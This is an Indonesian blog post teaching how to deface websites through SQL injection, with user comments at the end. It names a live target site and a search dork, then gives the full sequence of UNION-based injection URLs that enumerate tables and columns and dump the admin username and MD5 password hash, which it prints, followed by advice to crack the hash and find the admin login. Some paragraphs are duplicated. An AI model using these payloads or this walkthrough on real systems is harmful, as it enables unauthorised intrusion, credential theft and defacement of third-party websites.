sumber lebih di pentinkan: screamo-blackhat.blogspot.com
di postingan ku yang ke 7 ini saya akan membagikan cara deface dengan SQL injection
tehnik ini bisa di lakukan dengan ponsel atau pc/laptop
yang penting bisa internetan...
ini dia caranya:
buka browser anda masing masing siapkan kopi atau kuwaci (bagi yang lemot)
langsung dorknya :inurl:readnews.php?id=
kita akan menggunakan live target ini dia targetnya http://mostalocalcouncil.com/readnews.php?id=36 sekarang kita berikan akhiran ' di url menjadi http://mostalocalcouncil.com/readnews.php?id=36' lalu akan ada tulisan erorr
berarti situs itu vuln... jika tidak ada berarti situs itu sudah di path.. lanjut >>
sekarang kita hapus tanda ' ganti dengan +order+by+1-- . jika tidak error kita ganti dengan +order+by+2-- dan seterusnya ... sampai ada tulisan error lagi
tips:agar lebih cepat langsung sajah coba +order+by+10-- jika tidak error coba +order+by+20-- jika error terus ubah menjadi hitungan mundur hingga halaman kembali normal
back to topic ternyata errornya di 6 lalu kita tambahakan +union+select+1,2,3,4,5-- dan di antara = dengan no (36) tambahakn (-) kenapa sampai angka 5 karena ya harus segitu ... intinya angka nya tidak boleh melebihi/sama dengan angka errornya
seperti ini http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,2,3,4,5--
lanjut...>> nanti akan keluar angka togel (lol) itu bukan angka togrl tapi angka apa yah ??? kasih tau gk yah.. daya juga gk tau hehehehe... back to topic
yang ke luar angka pertamanya adalah 2 lalu kita ganti di +union+select+1,2,3,4,5-- dengan version() lalu enter or go dan mucul angka lagi .. dan yang kali ini muncul angka 5.0.96
Ganti tulisan "version()" di url dengan "group_concat(table_name)" tanpa tanda petik, dan +from+information_schema.tables+where+table_schema=database()--
contoh : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--
contoh : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--
dan muncul lah banyak category
Selanjutnya kita cari column dari ntable yg ada hubungannya dengan user+password admin,
jadi kita ambil table "users" tapi sebelumnya kata "users" tersebut kita convert dulu
ke HEXA agar dapat dibaca oleh SQL di sini :http://snarkles.net/scripts/sneak/sneak.php
ketik : users pilih ASCII to Hex hasilnya : 7573657273 (hapus jika berspasi)
Perintah selanjutnya adalah ubah [group_concat(column_ name)] pada(table_name) dan[+from+information_schema.columns+where+table_name=0xHEXA--] di akhir URL.
Ganti HEXA dengan hasil convert tadi yaitu : 7573657273 tambahkan 0x didepanHEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA
Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x7573657273--
kita berhasil menemukan kolom : id,username,password,name,email,lastlogin,ip
Pilih kolom username dan password aja ya gan hehe :D
jadi kita ambil table "users" tapi sebelumnya kata "users" tersebut kita convert dulu
ke HEXA agar dapat dibaca oleh SQL di sini :http://snarkles.net/scripts/sneak/sneak.php
ketik : users pilih ASCII to Hex hasilnya : 7573657273 (hapus jika berspasi)
Perintah selanjutnya adalah ubah [group_concat(column_ name)] pada(table_name) dan[+from+information_schema.columns+where+table_name=0xHEXA--] di akhir URL.
Ganti HEXA dengan hasil convert tadi yaitu : 7573657273 tambahkan 0x didepanHEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA
Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x7573657273--
kita berhasil menemukan kolom : id,username,password,name,email,lastlogin,ip
Pilih kolom username dan password aja ya gan hehe :D
Untuk melihat isi dari kolom tersebut ganti perintah[group_concat(username,0x3a,password)] pada (column_name) dan [+from +NAMATABLE--] pada akhir URL.
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke HEXA.
NAMATABLE diganti dengan "users"
Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(username,0x3a,password),3,4,5+from+users--
hasilnya muncul user dan password website tersebut :admin:68b752263e82b3b1ee1ffe739ee0eec1
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke HEXA.
NAMATABLE diganti dengan "users"
Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(username,0x3a,password),3,4,5+from+users--
hasilnya muncul user dan password website tersebut :admin:68b752263e82b3b1ee1ffe739ee0eec1
tinggal kita crack password md5nya langsung menuju situs ini
sudah deh tinggal nyari tempat login admin.. dan bagian itu lah yang susah.. kita butuh bantuan software
cara nyari tempat login admin akan saya bahas lain kali :)
thx to blog : http://screamo-blackhat.blogspot.com/2013/08/tutorial-sql-injection-versi-opera-mini.html
seperti biasa minta komentar buat blog ini :)
baru cara deface dengan hp,via hp,uc browser,opera mini,laptop,komputer,file chucker,cara mendeface untuk newbi langsung klik link ini
BalasHapuscara deface menggunakan hp
Wkwkwk berhasil :D
BalasHapusjgn lupa kunjungi juga rifkyof-cyber48.heck.in